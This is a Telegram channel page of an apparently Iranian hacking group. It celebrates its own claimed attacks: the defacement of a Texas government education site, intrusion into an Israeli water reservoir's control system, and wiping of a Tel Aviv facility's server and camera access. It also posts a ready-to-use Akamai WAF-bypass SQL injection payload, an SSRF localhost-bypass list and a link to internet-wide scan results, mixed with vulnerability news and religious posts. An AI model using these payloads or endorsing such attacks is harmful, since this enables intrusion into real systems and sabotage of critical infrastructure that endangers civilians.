Unidentified T E A M
1.22K subscribers
166 photos
45 videos
76 files
177 links
~⚘🌹 Just God 🌷~

🇮🇷 Unidentified Security Team 🇮🇷
_________________________________________________
< The Best Cyber Security Team in Iran right now

Support TEAM: @UNIDENTIFIED_TM_bot
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
هروقت دلم میگیرد ایه الکرسی میخونم
شفا دهنده مشکلات 🌹
آسیب پذیری 0day ارتقا سطح دسترسی در vmware که روی هر دو سیستم عامل windows و linux قابل اجراست ،هنوز از طرف کمپانی پچ نشده است.

آژانس امنیت سایبری و زیرساخت های ایالات متحده در مورد یک اسیب پذیری روز-صفر بر روی شش محصول VMware از جمله Workspace One ، Identity Manager و vRealize Suite Lifecycle Manager خود هشدار داد.
این باگ بسیار حیاتی از نوع Command Injection میباشد!!
در یک مصاحبه مجزا VMware ، گفت CVE-2020-4006 ، این باگ دارای درجه CVSS از 9.1 از 10 است. این شرکت اظهار داشت که وصله ها "در دسترس" هستند و راه حل های دم دستی و موقت برای چلوگیری از اکسپلویت CVE-2020-4006" موجود است.
شرکت ‌VMware نوشت: "هکر با دسترسی administrative configurator در شبکه بر روی پورت 8443 و یک رمز عبور معتبر برای حسابconfigurator admin ، می تواند دستوراتی را با امتیازات نامحدود در سیستم عامل زیر اجرا کند."

لیست کامل محصولاتی که دارای این اسیب پذیری هستند:
• VMware Workspace One Access (Access)
• VMware Workspace One Access Connector (Access Connector)
• VMware Identity Manager (vIDM)
• VMware Identity Manager Connector (vIDM Connector)
• VMware Cloud Foundation
• vRealize Suite Lifecycle Manager

@UNIDENTIFIED_TM 🌹
Forwarded from Web Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
نتایج اسکن کل اینترنت برای پورت ۴۴۳ که توسط یک فرد نیکوکار انجام شده

https://mega.nz/file/7NZW2Jha#YsO0mlag-R1G7fJI4FQVLsAkW8-VBYVLV_8oYTRZgCs


#scan
#enum


@UNIDENTIFIED_TM 🌹
Hacked by iranian hackers🌹

هنوز شروع نشده ...
#hard_revenge🖤

https://www1.highered.texas.gov/iran.htm


Zone-H
zone-h.org/mirror/id/34385203

@UNIDENTIFIED_TM
Media is too big
VIEW IN TELEGRAM
مخزن آب یوآو اسرائیل🇮🇱 مورد نفوذ قرار گرفت


133 متر
خلاصه
این مخزن از پساب های Kiryat Gat تغذیه می کند

گسترش

دسترسی ها:
Einan ، Efi Avraham
تاریخ به روز رسانی: 9/8/2020 05:26:59

درمورد این مخزن ابی:

دو مخزن پساب ، با حجم جمع آوری کل 4.5 میلیون متر مکعب ، که امکان بازیافت آب سالانه با حجم 7 میلیون متر مکعب را فراهم می کند - در محدوده شورای منطقه ای Yoav در شفله افتتاح شد. این دو مخزن با سرمایه گذاری کل 33 میلیون NIS توسط JNF تأسیس شده و بودجه آن توسط کمیسیون آب و کمیسیون تهیه خواهد شد.

@UNIDENTIFIED_TM
خرابکاری های بیشتری در راهه
This media is not supported in your browser
VIEW IN TELEGRAM
🖤 روزی که جامعه قرآنی یتیم شد..
روزی که بزرگترین سفیر قرآن و بزرگترین سفیر مسلمانان از این دنیا وداع گفت..
خبر وفات او به مثل یک صاعقه بر قلب میلیونها مسلمان در سرتاسر جهان فرود آمد...!
در تشییع جنازه او میلیونها نفر از دوستداران او و سفیران کشورهای جهان به نیابت پادشاهان و رؤسا و مردم حضور پیدا کردند..
جزو ۲۶ تشییع جنازه برتر تاریخ؛ که در سطح بین المللی و رسمی و مردمی برگزار شد !

▪️ فوروارد کنید و اشتراک بگذارید 🙏🏾

32مین
#سالگرد_وفات_استاد_عبدالباسط

@UNIDENTIFIED_TM
آماده سوپرایز هستید؟🌹
Anonymous Poll
76%
بله شما همیشه مارو سوپرایز میکنید
24%
نخیر
Akamai WAF Bypass & SQLi

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


#pentest
#waf_bypass


@UNIDENTIFIED_TM 🌹
Unidentified T E A M
مخزن آب یوآو اسرائیل🇮🇱 مورد نفوذ قرار گرفت 133 متر خلاصه این مخزن از پساب های Kiryat Gat تغذیه می کند گسترش دسترسی ها: Einan ، Efi Avraham تاریخ به روز رسانی: 9/8/2020 05:26:59 درمورد این مخزن ابی: دو مخزن پساب ، با حجم جمع آوری کل 4.5 میلیون متر…
Unidentified T E A M pinned «پوشش خبری رسانه های آنلاین ... https://www.otorio.com/blog/what-we-ve-learned-from-the-december-1st-attack-on-an-israeli-water-reservoir/ https://www.securityweek.com/iranian-hackers-access-unprotected-ics-israeli-water-facility https://securityaffair…»
This media is not supported in your browser
VIEW IN TELEGRAM
*.::in the name of God ::.*

با سلام خدمت دوستان گرامی

موج دیگر از حملات تیم ما به یه مجموعه در اسرائیل شهر Tel Aviv

גל נוסף של הצוות שלנו תוקף מתחם בעיר תל אביב הישראלית

Another wave of our team attacks a complex in the Israeli city of Tel Aviv

اطلاعات جزئی از تارگت رو در این ویدیو بهتون نشون میدم
اطلاعات سرور هم فرمت شد ...

این سیستم کنترلی مجهز دسترسی های زیر میباشد :

شامل دوربین های محوطه البته چند دسترسی دوربین رو پاک کردیم:

شامل باشگاه داخل اون محوطه ؛
شامل سیستم های دیگ که تو یه مجموعه وجود داره ؛
بخاطر افرادی که سو استفاده میکنند از کار های ما دیگر اطلاعت زیادی از تارگت به اشتراک نمیگذاریم
============================================================================
Telegram: T.ME/UNIDENTIFIED_TM

Twitter: https://twitter.com/UNIDENTIFIED_TM
SSRF Bypass list for localhost (127.0.0.1):

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://0xd8.0x3a.0xd6.0xe3
http://0xd83ad6e3
http://0xd8.0x3ad6e3
http://0xd8.0x3a.0xd6e3
http://0330.072.0326.0343
http://000330.0000072.0000326.00000343
http://033016553343
http://3627734755
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://216.0x3a.00000000326.0xe3
localtest.me
http://newyork.localtest.me
http://mysite.localtest.me
http://redirecttest.localtest.me
sub1.sub2.sub3.localtest.me
http://bugbounty.dod.network
http://spoofed.burpcollaborator.net


#ssrf
#bugbounty
#pentest


@UNIDENTIFIED_TM
سلام
دوستان صفحه توییتر تیم رو بستن از طرف توییتر دیگر داخل توییتر فعالیت نمیکنیم !
فکر میکنن با این کارای مسخره میتونن جلوی فعالیت تیم رو بگیریند واقعا مسخرس نمیدونم توییتر چرا اینجوری شده البته هیچ فرق به حال ما نمیکنه باعث شد دوباره حالشونو بگیریم
مایکروسافت تکنیک حمله ی سایبری که بخشی از اون از طریق SolarWinds انجام شده رو آنالیز و منتشر کرد :

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/
#securation
@UNIDENTIFIED_TM 🌹
This media is not supported in your browser
VIEW IN TELEGRAM
This video shows a "MITM" scenario performed between PLC and an HMI. This attack vector shows how to get full control of a motor (the endpoint device). after poisoning the arp table of the HMI and inserting fake values , they sent desirable values to the PLC directly in order to produce a false representation (similar to the results of the Stuxnet attack).
🌹
این ویدئو سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این بردار حمله نحوه کنترل کامل موتور (دستگاه نقطه انتهایی) را نشان می دهد. پس از مسموم كردن جدول arp از HMI و درج مقادیر جعلی ، آنها مقادیر مطلوبی را مستقیماً به PLC ارسال كردند تا نمایش غلطی ایجاد كنند (شبیه به نتایج حمله Stuxnet
#iot
#ics
#plc
@UNIDENTIFIED_TM